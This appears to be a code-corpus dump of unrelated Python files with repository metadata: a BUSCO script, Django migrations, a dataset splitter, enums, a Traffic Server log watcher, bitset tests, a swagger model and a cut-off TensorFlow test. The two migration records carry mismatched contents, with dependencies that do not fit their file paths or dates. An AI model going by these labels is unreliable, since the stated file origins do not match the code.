parser.add_option("-b", "--busco", dest="busco",
                  default=None,
                  help="full_table_*_BUSCO output from BUSCO",
                  metavar="FILE")

(options, args) = parser.parse_args()
prefix = options.prefix
busco = options.busco

# Run as script
if __name__ == '__main__':
    # call function to get a list of duplicated genes.
    # these genes will be ignored
    duplicated_list = parse_busco_file(busco)
    # iterate through the dir
    for filename in os.listdir("."):
        count = 1
        if not filename.endswith(".fas"):
            continue
        # filter out the ones we don't want
        if filename.split(".fa")[0] in duplicated_list:
            continue
        out_file = "../" + prefix + filename
        out_file = out_file.replace("BUSCOa", "")
        # out_file = "../" + filename
        try:
            # print filename
            reformat_as_fasta(filename, prefix, out_file)
        except ValueError:
            continue
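A quick illustration of the status filtering done by `parse_busco_file`, run against a made-up three-row table (the column layout assumed here — BUSCO id first, status second, tab-separated — is what the function expects):

```python
# Hypothetical miniature of a BUSCO full table; the ids and scaffolds are invented.
sample_lines = [
    "# BUSCO full table (made-up sample)",
    "BUSCO_g1\tComplete\tscaffold_1",
    "BUSCO_g2\tDuplicated\tscaffold_2",
    "BUSCO_g3\tFragmented\tscaffold_3",
]

duplicated = []
for line in sample_lines:
    # Skip blank lines and comment headers, as the real function does.
    if not line.strip() or line.startswith("#"):
        continue
    busco_name, status = line.rstrip().split("\t")[:2]
    if status in ("Duplicated", "Fragmented"):
        duplicated.append(busco_name)
# Only the Duplicated and Fragmented entries are collected.
```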
| 26.707692 | 84 | 0.579781 | 436 | 3,472 | 4.522936 | 0.385321 | 0.015213 | 0.022819 | 0.01927 | 0.105477 | 0.076065 | 0.076065 | 0.076065 | 0.076065 | 0.076065 | 0 | 0.005363 | 0.301843 | 3,472 | 129 | 85 | 26.914729 | 0.808168 | 0.116935 | 0 | 0.2375 | 0 | 0 | 0.201359 | 0.008226 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0875 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22d2e5e3c594615ca7c099c59610e2d90de239db | 403 | py | Python | pages/migrations/0004_auto_20181102_0944.py | yogeshprasad/spa-development | 1bee9ca64da5815e1c9a2f7af43b44b59ee2ca7b | [
"Apache-2.0"
] | null | null | null | pages/migrations/0004_auto_20181102_0944.py | yogeshprasad/spa-development | 1bee9ca64da5815e1c9a2f7af43b44b59ee2ca7b | [
"Apache-2.0"
] | 7 | 2020-06-05T19:11:22.000Z | 2022-03-11T23:30:57.000Z | pages/migrations/0004_auto_20181102_0944.py | yogeshprasad/spa-development | 1bee9ca64da5815e1c9a2f7af43b44b59ee2ca7b | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.6 on 2018-11-02 09:44
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('classroom', '0024_auto_20190825_1723'),
    ]

    operations = [
        migrations.AddField(
            model_name='myfile',
            name='file',
            field=models.CharField(blank=True, max_length=100),
        ),
    ]
| 21.210526 | 63 | 0.602978 | 41 | 403 | 5.853659 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075601 | 0.277916 | 403 | 18 | 64 | 22.388889 | 0.749141 | 0.111663 | 0 | 0 | 1 | 0 | 0.129213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22d31dc3511cd477901e03ecc8f042e8c0f688bf | 1,119 | py | Python | imageclassification/src/sample/splitters/_StratifiedSplitter.py | waikato-datamining/keras-imaging | f044f883242895c18cfdb31a827bc32bdb0405ed | [
"MIT"
] | null | null | null | imageclassification/src/sample/splitters/_StratifiedSplitter.py | waikato-datamining/keras-imaging | f044f883242895c18cfdb31a827bc32bdb0405ed | [
"MIT"
] | null | null | null | imageclassification/src/sample/splitters/_StratifiedSplitter.py | waikato-datamining/keras-imaging | f044f883242895c18cfdb31a827bc32bdb0405ed | [
"MIT"
] | 1 | 2020-04-16T15:29:28.000Z | 2020-04-16T15:29:28.000Z | from collections import OrderedDict
from random import Random
from typing import Set
from .._types import Dataset, Split, LabelIndices
from .._util import per_label
from ._RandomSplitter import RandomSplitter
from ._Splitter import Splitter
class StratifiedSplitter(Splitter):
    """
    TODO
    """
    def __init__(self, percentage: float, labels: LabelIndices, random: Random = Random()):
        self._percentage = percentage
        self._labels = labels
        self._random = random

    def __str__(self) -> str:
        return f"strat-{self._percentage}"

    def __call__(self, dataset: Dataset) -> Split:
        subsets_per_label = per_label(dataset)
        sub_splits = {
            label: RandomSplitter(int(len(subsets_per_label[label]) * self._percentage), self._random)(subsets_per_label[label])
            for label in self._labels.keys()
        }
        result = OrderedDict(), OrderedDict()
        for filename, label in dataset.items():
            result_index = 0 if filename in sub_splits[label][0] else 1
            result[result_index][filename] = label
        return result
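The splitter takes a random sample of each label's files separately, so both output parts keep the original label proportions. A self-contained sketch of that per-label sampling idea, without the project's `per_label`/`RandomSplitter` helpers:

```python
import random
from collections import defaultdict

def stratified_split(dataset, percentage, seed=0):
    """dataset: {filename: label}. Returns (train, rest) dicts that keep
    roughly the same label proportions in both parts."""
    rng = random.Random(seed)
    by_label = defaultdict(list)
    for filename, label in dataset.items():
        by_label[label].append(filename)
    train, rest = {}, {}
    for label, files in by_label.items():
        rng.shuffle(files)
        cut = int(len(files) * percentage)  # sample size for this label
        for name in files[:cut]:
            train[name] = label
        for name in files[cut:]:
            rest[name] = label
    return train, rest

dataset = {f"a{i}.png": "a" for i in range(4)}
dataset.update({f"b{i}.png": "b" for i in range(4)})
train, rest = stratified_split(dataset, 0.5)
# Each part gets exactly half of each label's files.
```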
| 28.692308 | 128 | 0.671135 | 127 | 1,119 | 5.637795 | 0.362205 | 0.055866 | 0.062849 | 0.055866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003521 | 0.238606 | 1,119 | 38 | 129 | 29.447368 | 0.836854 | 0.003575 | 0 | 0 | 0 | 0 | 0.021838 | 0.021838 | 0 | 0 | 0 | 0.026316 | 0 | 1 | 0.12 | false | 0 | 0.28 | 0.04 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22d37205c7c002b3538af8a7bcaeddcf556d57d9 | 315 | py | Python | revenuecat_python/enums.py | YuraHavrylko/revenuecat_python | a25b234933b6e80e1ff09b6a82d73a0e3df91caa | [
"MIT"
] | 1 | 2020-12-11T09:31:02.000Z | 2020-12-11T09:31:02.000Z | revenuecat_python/enums.py | YuraHavrylko/revenuecat_python | a25b234933b6e80e1ff09b6a82d73a0e3df91caa | [
"MIT"
] | null | null | null | revenuecat_python/enums.py | YuraHavrylko/revenuecat_python | a25b234933b6e80e1ff09b6a82d73a0e3df91caa | [
"MIT"
] | null | null | null | from enum import Enum
class SubscriptionPlatform(Enum):
    ios = 'ios'
    android = 'android'
    macos = 'macos'
    uikitformac = 'uikitformac'
    stripe = 'stripe'


class AttributionNetworkCode(Enum):
    apple_search_ads = 0
    adjust = 1
    apps_flyer = 2
    branch = 3
    tenjin = 4
facebook = 5 | 17.5 | 35 | 0.634921 | 35 | 315 | 5.628571 | 0.742857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026432 | 0.279365 | 315 | 18 | 36 | 17.5 | 0.84141 | 0 | 0 | 0 | 0 | 0 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
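The integer codes round-trip through standard `Enum` value lookup, which is how a numeric network code from an API payload maps back to a member. A minimal sketch (member names copied from the enum above, trimmed for brevity):

```python
from enum import Enum

class AttributionNetworkCode(Enum):
    apple_search_ads = 0
    adjust = 1
    apps_flyer = 2

# Enum(value) looks a member up by its value; .value goes the other way.
looked_up = AttributionNetworkCode(1)
```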
22d9ab4bf21ea11b6c751dd2350676d79a0f46d5 | 397 | py | Python | classroom/migrations/0025_myfile_file.py | Abulhusain/E-learing | 65cfe3125f1b6794572ef2daf89917976f0eac09 | [
"MIT"
] | 5 | 2019-06-19T03:47:17.000Z | 2020-06-11T17:46:50.000Z | classroom/migrations/0025_myfile_file.py | Abulhusain/E-learing | 65cfe3125f1b6794572ef2daf89917976f0eac09 | [
"MIT"
] | 3 | 2021-03-19T01:23:12.000Z | 2021-09-08T01:05:25.000Z | classroom/migrations/0025_myfile_file.py | seeej/digiwiz | 96ddfc22fe4c815feec3d75c30576fec5f344154 | [
"MIT"
] | 1 | 2021-06-04T05:58:15.000Z | 2021-06-04T05:58:15.000Z | # Generated by Django 2.2.2 on 2019-08-25 09:29
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('pages', '0003_coachingcourse'),
    ]

    operations = [
        migrations.AlterField(
            model_name='coachingcourse',
            name='username',
            field=models.CharField(default='', max_length=100),
        ),
    ]
| 20.894737 | 63 | 0.602015 | 44 | 397 | 5.318182 | 0.818182 | 0.017094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119298 | 0.282116 | 397 | 18 | 64 | 22.055556 | 0.701754 | 0.11335 | 0 | 0 | 1 | 0 | 0.12 | 0.065714 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22da72ceaa2598d408165e577728716dec2eb71a | 11,928 | py | Python | tmp/real_time_log_analy/logWatcher.py | hankai17/test | 8f38d999a7c6a92eac94b4d9dc8e444619d2144f | [
"MIT"
] | 7 | 2017-07-16T15:09:26.000Z | 2021-09-01T02:13:15.000Z | tmp/real_time_log_analy/logWatcher.py | hankai17/test | 8f38d999a7c6a92eac94b4d9dc8e444619d2144f | [
"MIT"
] | null | null | null | tmp/real_time_log_analy/logWatcher.py | hankai17/test | 8f38d999a7c6a92eac94b4d9dc8e444619d2144f | [
"MIT"
] | 3 | 2017-09-13T09:54:49.000Z | 2019-03-18T01:29:15.000Z | #!/usr/bin/env python
import os
import sys
import time
import errno
import stat
import datetime
import socket
import struct
import atexit
import logging
#from lru import LRUCacheDict
from logging import handlers
from task_manager import Job, taskManage
from ctypes import *
from urlparse import *
from multiprocessing import Process,Lock
from log_obj import CLog
from parse_conf import cConfParser
log_file = "timelog.log"
log_fmt = '%(asctime)s: %(message)s'
config_file = 'test.config'
domain_white_dict = {}
pps_ip_list = []
pps_port = 0
domain_sfx_err_count = 0
domain_sfx_err_rate = 0
ats_ip = ''
def daemonize(pid_file=None):
    pid = os.fork()
    if pid:
        sys.exit(0)
    os.chdir('/')
    os.umask(0)
    os.setsid()
    _pid = os.fork()
    if _pid:
        sys.exit(0)
    sys.stdout.flush()
    sys.stderr.flush()
    with open('/dev/null') as read_null, open('/dev/null', 'w') as write_null:
        os.dup2(read_null.fileno(), sys.stdin.fileno())
        os.dup2(write_null.fileno(), sys.stdout.fileno())
        os.dup2(write_null.fileno(), sys.stderr.fileno())
    if pid_file:
        with open(pid_file, 'w+') as f:
            f.write(str(os.getpid()))
        atexit.register(os.remove, pid_file)
def get_suffix(p):
    if len(p) == 1:
        #return "pure domain"
        return "nil"
    fields = p.split("/")
    if len(fields) == 0 or len(fields) == 1:
        return "null"
    fields1 = fields[len(fields) - 1].split(".")
    if len(fields1) == 0 or len(fields1) == 1:
        return "null"
    else:
        return fields1[len(fields1) - 1]
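A self-contained Python 3 copy of the suffix logic, for illustration: it returns the file extension of a URL path, "nil" for a bare "/", and "null" when no extension can be found.

```python
def get_suffix(p):
    # Bare "/" path: no file component at all.
    if len(p) == 1:
        return "nil"
    fields = p.split("/")
    if len(fields) <= 1:
        return "null"
    # Last path component, split on ".": the final piece is the extension.
    fields1 = fields[-1].split(".")
    if len(fields1) <= 1:
        return "null"
    return fields1[-1]
```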
class LogWatcher(object):
    def __init__(self, folder, callback, extensions=["log"], logfile_keyword="squid", tail_lines=0):
        self.files_map = {}
        self.callback = callback
        self.folder = os.path.realpath(folder)
        self.extensions = extensions
        self.logfile_kw = logfile_keyword
        assert os.path.exists(self.folder), "%s does not exist" % self.folder
        assert callable(callback)
        self.update_files()
        for id, file in self.files_map.iteritems():
            file.seek(os.path.getsize(file.name))  # EOF
            if tail_lines:
                lines = self.tail(file.name, tail_lines)
                if lines:
                    self.callback(file.name, lines)

    def __del__(self):
        self.close()

    def loop(self, interval=0.1, async=False):
        while 1:
            try:
                self.update_files()
                for fid, file in list(self.files_map.iteritems()):
                    self.readfile(file)
                if async:
                    return
                time.sleep(interval)
            except KeyboardInterrupt:
                break

    def log(self, line):
        print line

    def listdir(self):
        ls = os.listdir(self.folder)
        if self.extensions:
            return [x for x in ls if os.path.splitext(x)[1][1:] in self.extensions and self.logfile_kw in os.path.split(x)[1]]
        else:
            return ls

    @staticmethod
    def tail(fname, window):
        try:
            f = open(fname, 'r')
        except IOError, err:
            if err.errno == errno.ENOENT:
                return []
            else:
                raise
        else:
            BUFSIZ = 1024
            f.seek(0, os.SEEK_END)
            fsize = f.tell()
            block = -1
            data = ""
            exit = False
            while not exit:
                step = (block * BUFSIZ)
                if abs(step) >= fsize:
                    f.seek(0)
                    exit = True
                else:
                    f.seek(step, os.SEEK_END)
                data = f.read().strip()
                if data.count('\n') >= window:
                    break
                else:
                    block -= 1
            return data.splitlines()[-window:]
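The `tail` method above reads growing blocks from the end of the file until it has enough newlines. When the lines are already in memory, a bounded `deque` gives the same "last N lines" result with the bookkeeping done for you — a simpler sketch of the same idea:

```python
from collections import deque

def tail_lines(lines, window):
    # deque with maxlen keeps only the last `window` items pushed into it.
    return list(deque(lines, maxlen=window))
```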
    def update_files(self):
        ls = []
        if os.path.isdir(self.folder):
            for name in self.listdir():
                absname = os.path.realpath(os.path.join(self.folder, name))
                try:
                    st = os.stat(absname)
                except EnvironmentError, err:
                    if err.errno != errno.ENOENT:
                        raise
                else:
                    if not stat.S_ISREG(st.st_mode):
                        continue
                    fid = self.get_file_id(st)
                    ls.append((fid, absname))
        elif os.path.isfile(self.folder):
            absname = os.path.realpath(self.folder)
            try:
                st = os.stat(absname)
            except EnvironmentError, err:
                if err.errno != errno.ENOENT:
                    raise
            else:
                fid = self.get_file_id(st)
                ls.append((fid, absname))
        else:
            print 'You submitted an object that was neither a file or folder...exiting now.'
            sys.exit()

        for fid, file in list(self.files_map.iteritems()):
            try:
                st = os.stat(file.name)
            except EnvironmentError, err:
                if err.errno == errno.ENOENT:
                    self.unwatch(file, fid)
                else:
                    raise
            else:
                if fid != self.get_file_id(st):
                    self.unwatch(file, fid)
                    self.watch(file.name)
        for fid, fname in ls:
            if fid not in self.files_map:
                self.watch(fname)

    def readfile(self, file):
        lines = file.readlines()
        if lines:
            self.callback(file.name, lines)

    def watch(self, fname):
        try:
            file = open(fname, "r")
            fid = self.get_file_id(os.stat(fname))
        except EnvironmentError, err:
            if err.errno != errno.ENOENT:
                raise
        else:
            self.log("watching logfile %s" % fname)
            self.files_map[fid] = file

    def unwatch(self, file, fid):
        lines = self.readfile(file)
        self.log("un-watching logfile %s" % file.name)
        del self.files_map[fid]
        if lines:
            self.callback(file.name, lines)

    @staticmethod
    def get_file_id(st):
        return "%xg%x" % (st.st_dev, st.st_ino)

    def close(self):
        for id, file in self.files_map.iteritems():
            file.close()
        self.files_map.clear()
def udp_send_message(ip_list, port, arr):
    for ip in ip_list:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.sendto(arr, (ip, port))
        s.close()


def pull_data(job):
    if not (job.sfx == "nil" or job.sfx == "null"):
        fmt = "=HHHH%dsH%dsH" % (len(job.url), len(job.sfx))
        data = struct.pack(
            fmt,
            80,                                        # id
            1,                                         # type
            8 + len(job.url) + 2 + len(job.sfx) + 1,   # length
            len(job.url),                              # domain_len
            job.url,                                   # domain
            len(job.sfx),                              # sfx_len
            job.sfx,                                   # sfx
            0
        )
    else:
        fmt = "=HHHH%dsH" % (len(job.url))
        data = struct.pack(
            fmt,
            80,                     # id
            1,                      # type
            8 + len(job.url) + 1,   # length
            len(job.url),           # domain_len
            job.url,
            0
        )
    global pps_ip_list
    global pps_port
    udp_send_message(pps_ip_list, pps_port, data)
    tmg.done_task_add(job)
    log_message = job.url + ' ' + job.sfx
    loger.write(20, log_message)
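The packed message is a native-order (`=`) header of four unsigned shorts followed by length-prefixed domain and suffix bytes. A hypothetical round-trip with Python 3's `struct` (the domain and suffix values are invented for illustration):

```python
import struct

url = b"example.com"
sfx = b"mp4"
# Same layout as the first branch above: id, type, length, domain_len,
# domain bytes, sfx_len, sfx bytes, terminating zero short.
fmt = "=HHHH%dsH%dsH" % (len(url), len(sfx))
data = struct.pack(fmt, 80, 1, 8 + len(url) + 2 + len(sfx) + 1,
                   len(url), url, len(sfx), sfx, 0)
unpacked = struct.unpack(fmt, data)
```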
def callback_routine(idx):
    print 'callback_routine'


def get_domain_white(f):
    if len(f) == 0:
        print 'No domain_white_list'
        return
    filename = f
    fd = open(filename, 'r')
    for line in fd.readlines():
        line = line.strip()
        if not domain_white_dict.has_key(line):
            domain_white_dict[line] = 1
    print 'parse domain_white_list done'


def period_check_task(job):
    global txn_idx
    global once_flag
    global domain_sfx_err_count
    global domain_sfx_err_rate
    if txn_idx == 0 and once_flag == 0:
        once_flag = 1
        tmg.done_task_add(job)
        job.addtime = time.time()
        tmg.task_add(job)
        return
    loger.write(10, '------>')
    mutex.acquire()
    for k in d1.keys():
        if domain_white_dict.has_key(k):
            continue
        for k1 in d1[k].keys():
            err_rate = d1[k][k1]['not_ok'] * 100 / (d1[k][k1]['not_ok'] + d1[k][k1]['20x'])
            log_message = k + ' ' + str(err_rate)
            loger.write(10, log_message)
            if err_rate >= domain_sfx_err_rate and (d1[k][k1]['not_ok'] + d1[k][k1]['20x']) >= domain_sfx_err_count:
                #print "will add to task", k, k1, "ok:", d1[k][k1]['20x'], "not_ok:", d1[k][k1]['not_ok'], "err rate:", err_rate
                txn_idx += 1
                job = Job(txn_idx, pull_data, time.time(), 0, k, '', callback_routine, k1, '')
                tmg.task_add(job)
    loger.write(10, '<------')
    d1.clear()
    mutex.release()
    tmg.done_task_add(job)
    if job.period > 0:
        job.addtime = time.time()
        tmg.task_add(job)
def config_parse():
    global domain_sfx_err_count
    global domain_sfx_err_rate
    global pps_ip_list
    global pps_port
    global ats_ip
    cp = cConfParser(config_file)
    pps_ip = cp.get('common', 'pps_ip')
    fields = pps_ip.strip().split('|')
    if len(fields) > 0:
        for i in fields:
            pps_ip_list.append(i)
    else:
        pps_ip_list.append(pps_ip)
    pps_port = int(cp.get('common', 'pps_port'))
    domain_sfx_err_count = int(cp.get('common', 'domain_sfx_err_count'))
    domain_sfx_err_rate = int(cp.get('common', 'domain_sfx_err_rate'))
    ats_ip = cp.get('common', 'ats_ip')
    print 'ats_ip: ', ats_ip
    print 'pps_ip: ', pps_ip
    print 'pps_port: ', pps_port
    print 'domain_sfx_err_count: ', domain_sfx_err_count
    print 'domain_sfx_err_rate: ', domain_sfx_err_rate
    return cp
once_flag = 0
txn_idx = 0
d1 = {}
mutex = Lock()
version_message = '1.0.1'
#1.0.1: Add conf obj; Add log obj
#1.0.2: More pps. add tool config
if __name__ == '__main__':
help_message = 'Usage: python %s' % sys.argv[0]
if len(sys.argv) == 2 and (sys.argv[1] in '--version'):
print version_message
exit(1)
if len(sys.argv) == 2 and (sys.argv[1] in '--help'):
print help_message
exit(1)
if len(sys.argv) != 1:
print help_message
exit(1)
cp = config_parse()
get_domain_white(cp.get('common', 'domain_white_list'))
loger = CLog(log_file, log_fmt, 12, 5, cp.get('common', 'debug'))
print 'Start ok'
daemonize()
tmg = taskManage()
tmg.run()
pull_pps_job = Job(txn_idx, period_check_task, time.time(), int(cp.get('common', 'interval')), '', '', callback_routine, '', '')
tmg.task_add(pull_pps_job)
def callback(filename, lines):
for line in lines:
fields = line.strip().split("'")
http_code = fields[23]
domain = fields[13]
log_message = 'new line ' + domain
#loger.write(10, log_message)
# strip an optional :port suffix
domain = domain.split(":")[0]
user_ip = fields[5]
result = urlparse(fields[15])
sfx = get_suffix(result.path)
if sfx == 'nil' or sfx == 'null':
continue
if len(domain) <= 3:
continue
#is watch req
global ats_ip
if user_ip == ats_ip:
continue
mutex.acquire()
sfx_dict = d1.setdefault(domain, {})
if sfx not in sfx_dict:
sfx_dict[sfx] = {'20x': 0, 'not_ok': 0}
# 'http_code in "200"' is a substring test, not equality; compare against a tuple
if http_code not in ("200", "206", "304", "204"):
sfx_dict[sfx]['not_ok'] += 1
else:
sfx_dict[sfx]['20x'] += 1
mutex.release()
l = LogWatcher("/opt/ats/var/log/trafficserver", callback)
l.loop()
#https://docs.python.org/2/library/ctypes.html
#https://blog.csdn.net/u012611644/article/details/80529746
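The pull condition used by `period_check_task` above (error rate AND minimum sample count must both reach their thresholds) can be distilled into a pure function. A sketch with hypothetical names, not part of the original script:

```python
def should_pull(ok, not_ok, min_count, min_rate):
    """Return True when a (domain, suffix) pair deserves a deeper check:
    its error rate is at least min_rate percent AND it has at least
    min_count total samples (mirrors the check on err_rate above)."""
    total = ok + not_ok
    if total == 0:
        return False
    err_rate = not_ok * 100 / float(total)
    return err_rate >= min_rate and total >= min_count

print(should_pull(20, 80, min_count=50, min_rate=60))  # True: 80% errors, 100 samples
print(should_pull(1, 4, min_count=50, min_rate=60))    # False: only 5 samples
```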
# ---- python/test/test_dynamic_bitset.py (repo: hagabb/katana, license: BSD-3-Clause) ----
import pytest
from katana.dynamic_bitset import DynamicBitset
__all__ = []
SIZE = 50
@pytest.fixture
def dbs():
return DynamicBitset(SIZE)
def test_set(dbs):
dbs[10] = 1
assert dbs[10]
def test_set_invalid_type(dbs):
with pytest.raises(TypeError):
dbs[2.3] = 0
def test_set_invalid_index_low(dbs):
with pytest.raises(IndexError):
dbs[-1] = 1
def test_set_invalid_index_high(dbs):
with pytest.raises(IndexError):
dbs[SIZE] = 1
def test_reset(dbs):
dbs[10] = 1
dbs.reset()
assert not dbs[10]
assert len(dbs) == SIZE
def test_reset_index(dbs):
dbs[10] = 1
dbs[10] = 0
assert not dbs[10]
def test_reset_begin_end(dbs):
dbs[10] = 1
dbs[15] = 1
dbs[12:17] = 0
assert dbs[10]
assert not dbs[15]
def test_reset_begin_end_invalid_step(dbs):
with pytest.raises(ValueError):
dbs[12:17:22] = 0
def test_reset_none_end(dbs):
dbs[10] = 1
dbs[15] = 1
dbs[:12] = 0
assert not dbs[10]
assert dbs[15]
def test_resize(dbs):
dbs.resize(20)
assert len(dbs) == 20
dbs[8] = 1
dbs.resize(20)
assert len(dbs) == 20
assert dbs[8]
dbs.resize(70)
assert len(dbs) == 70
assert dbs[8]
assert dbs.count() == 1
def test_clear(dbs):
dbs[10] = 1
dbs.clear()
assert len(dbs) == 0
dbs.resize(20)
assert len(dbs) == 20
assert not dbs[10]
def test_count(dbs):
dbs[10] = 1
assert dbs.count() == 1
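The interface these tests exercise (integer indexing with type/range checks, contiguous-slice reset, reset, resize, clear, count) can be mimicked by a minimal pure-Python stand-in for experimentation. This is a sketch, not the real `DynamicBitset`, which is provided by the `katana` package:

```python
class ToyBitset:
    """Minimal stand-in for katana's DynamicBitset (sketch only)."""

    def __init__(self, size):
        self._bits = [False] * size

    def __len__(self):
        return len(self._bits)

    def _check_index(self, index):
        if not isinstance(index, int):
            raise TypeError("index must be an integer")
        if index < 0 or index >= len(self._bits):
            raise IndexError("index out of range")

    def __getitem__(self, index):
        self._check_index(index)
        return self._bits[index]

    def __setitem__(self, key, value):
        if isinstance(key, slice):
            # only contiguous ranges are supported, as in the tests above
            if key.step is not None and key.step != 1:
                raise ValueError("only contiguous slices are supported")
            start = 0 if key.start is None else key.start
            stop = len(self._bits) if key.stop is None else key.stop
            for i in range(start, stop):
                self._bits[i] = bool(value)
            return
        self._check_index(key)
        self._bits[key] = bool(value)

    def reset(self):
        self._bits = [False] * len(self._bits)

    def resize(self, size):
        # keep existing bits up to the new size, pad with False when growing
        kept = self._bits[:size]
        self._bits = kept + [False] * (size - len(kept))

    def clear(self):
        self._bits = []

    def count(self):
        return sum(self._bits)
```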
# ---- src/clients/ctm_api_client/models/user_additional_properties.py (repo: IceT-M/ctm-python-client, license: BSD-3-Clause) ----
# coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.215
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from clients.ctm_api_client.configuration import Configuration
class UserAdditionalProperties(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
"member_of_groups": "list[str]",
"authentication": "AuthenticationData",
"is_external_user": "bool",
}
attribute_map = {
"member_of_groups": "memberOfGroups",
"authentication": "authentication",
"is_external_user": "isExternalUser",
}
def __init__(
self,
member_of_groups=None,
authentication=None,
is_external_user=None,
_configuration=None,
): # noqa: E501
"""UserAdditionalProperties - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._member_of_groups = None
self._authentication = None
self._is_external_user = None
self.discriminator = None
if member_of_groups is not None:
self.member_of_groups = member_of_groups
if authentication is not None:
self.authentication = authentication
if is_external_user is not None:
self.is_external_user = is_external_user
@property
def member_of_groups(self):
"""Gets the member_of_groups of this UserAdditionalProperties. # noqa: E501
List of role names # noqa: E501
:return: The member_of_groups of this UserAdditionalProperties. # noqa: E501
:rtype: list[str]
"""
return self._member_of_groups
@member_of_groups.setter
def member_of_groups(self, member_of_groups):
"""Sets the member_of_groups of this UserAdditionalProperties.
List of role names # noqa: E501
:param member_of_groups: The member_of_groups of this UserAdditionalProperties. # noqa: E501
:type: list[str]
"""
self._member_of_groups = member_of_groups
@property
def authentication(self):
"""Gets the authentication of this UserAdditionalProperties. # noqa: E501
user authentication # noqa: E501
:return: The authentication of this UserAdditionalProperties. # noqa: E501
:rtype: AuthenticationData
"""
return self._authentication
@authentication.setter
def authentication(self, authentication):
"""Sets the authentication of this UserAdditionalProperties.
user authentication # noqa: E501
:param authentication: The authentication of this UserAdditionalProperties. # noqa: E501
:type: AuthenticationData
"""
self._authentication = authentication
@property
def is_external_user(self):
"""Gets the is_external_user of this UserAdditionalProperties. # noqa: E501
:return: The is_external_user of this UserAdditionalProperties. # noqa: E501
:rtype: bool
"""
return self._is_external_user
@is_external_user.setter
def is_external_user(self, is_external_user):
"""Sets the is_external_user of this UserAdditionalProperties.
:param is_external_user: The is_external_user of this UserAdditionalProperties. # noqa: E501
:type: bool
"""
self._is_external_user = is_external_user
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(UserAdditionalProperties, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UserAdditionalProperties):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, UserAdditionalProperties):
return True
return self.to_dict() != other.to_dict()
# ---- object_detection/exporter_test.py (repo: travisyates81/object-detection, license: MIT) ----
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Travis Yates
"""Tests for object_detection.export_inference_graph."""
import os
import mock
import numpy as np
import tensorflow as tf
from object_detection import exporter
from object_detection.builders import model_builder
from object_detection.core import model
from object_detection.protos import pipeline_pb2
class FakeModel(model.DetectionModel):
def preprocess(self, inputs):
return (tf.identity(inputs) *
tf.get_variable('dummy', shape=(),
initializer=tf.constant_initializer(2),
dtype=tf.float32))
def predict(self, preprocessed_inputs):
return {'image': tf.identity(preprocessed_inputs)}
def postprocess(self, prediction_dict):
with tf.control_dependencies(prediction_dict.values()):
return {
